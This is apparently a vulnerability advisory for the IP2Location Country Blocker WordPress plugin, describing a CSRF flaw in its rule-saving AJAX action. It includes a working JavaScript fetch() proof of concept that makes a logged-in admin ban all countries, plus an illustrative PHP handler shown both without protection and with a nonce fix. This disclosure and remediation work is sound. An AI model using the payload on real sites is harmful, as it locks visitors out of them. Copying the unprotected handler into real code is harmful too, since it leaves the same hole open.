WordPress Plugin Vulnerabilities
IP2Location Country Blocker < 2.26.6 - Arbitrary Country Ban via CSRF
Description
The plugin does not have a CSRF check in the ip2location_country_blocker_save_rules AJAX action, allowing attackers to make a logged-in admin block an arbitrary country, or all countries at once, preventing users from accessing the frontend.
Proof of Concept
Make an admin open a page with the following code in it, which will ban visitors from all countries:

    fetch("https://example.com/wp-admin/admin-ajax.php", {
        "headers": {
            "content-type": "application/x-www-form-urlencoded",
        },
        "body": new URLSearchParams({
            "action": "ip2location_country_blocker_save_rules",
            "countries[]": "nonexistent",
            "mode": 0
        }),
        "method": "POST",
        "credentials": "include"
    })
    .then(response => response.text())
    .then(function(data) { console.log(data); });
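The root cause is an AJAX handler that acts on the request without verifying that it originated from the plugin's own settings page. The following is an added illustration, not the plugin's actual code: a hypothetical handler for the same action shown without protection and then with the standard WordPress fix (a nonce tied to the action plus a capability check). The function names, option names and the i2l_save_rules nonce action are assumptions.

```php
<?php
// Added example (not IP2Location Country Blocker's code). Names prefixed i2l_ are hypothetical.

// Before: the handler trusts any request that carries the admin's session cookie,
// so a cross-site POST with credentials is processed as if the admin submitted it.
function i2l_save_rules_unprotected() {
    $countries = isset( $_POST['countries'] ) ? (array) $_POST['countries'] : array();
    $mode      = isset( $_POST['mode'] ) ? (int) $_POST['mode'] : 0;
    update_option( 'i2l_blocked_countries', array_map( 'sanitize_text_field', $countries ) );
    update_option( 'i2l_block_mode', $mode );
    wp_send_json_success();
}

// After: require a nonce bound to this action and the current user, and confirm the caller
// may change site settings. check_ajax_referer() terminates the request with HTTP 403 when
// the nonce is absent or invalid, so a forged cross-site request never reaches update_option().
function i2l_save_rules_protected() {
    check_ajax_referer( 'i2l_save_rules', '_wpnonce' );
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_send_json_error( 'forbidden', 403 );
    }
    $countries = isset( $_POST['countries'] ) ? (array) $_POST['countries'] : array();
    $mode      = isset( $_POST['mode'] ) ? (int) $_POST['mode'] : 0;
    update_option( 'i2l_blocked_countries', array_map( 'sanitize_text_field', $countries ) );
    update_option( 'i2l_block_mode', $mode );
    wp_send_json_success();
}
add_action( 'wp_ajax_ip2location_country_blocker_save_rules', 'i2l_save_rules_protected' );

// The settings page script must receive the nonce so that legitimate saves still succeed;
// an attacker's page cannot read this value because of the same-origin policy.
function i2l_enqueue_settings_script() {
    wp_enqueue_script( 'i2l-settings', plugins_url( 'settings.js', __FILE__ ), array(), '1.0', true );
    wp_localize_script( 'i2l-settings', 'i2lSettings', array(
        'nonce' => wp_create_nonce( 'i2l_save_rules' ),
    ) );
}
add_action( 'admin_enqueue_scripts', 'i2l_enqueue_settings_script' );
```

The page's own script would then send `_wpnonce: i2lSettings.nonce` alongside `action`, `countries[]` and `mode`; a request lacking a valid nonce, such as the one in the proof of concept above, is rejected before any rule is saved.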
Affects Plugins
References
Classification
Type
CSRF
OWASP top 10
CWE
CVSS
Miscellaneous
Original Researcher
Krzysztof Zając
Submitter
Krzysztof Zając
Submitter website
Verified
Yes
WPVDB ID
Timeline
Publicly Published
2022-01-06
Added
2022-01-06
Last Updated
2022-04-08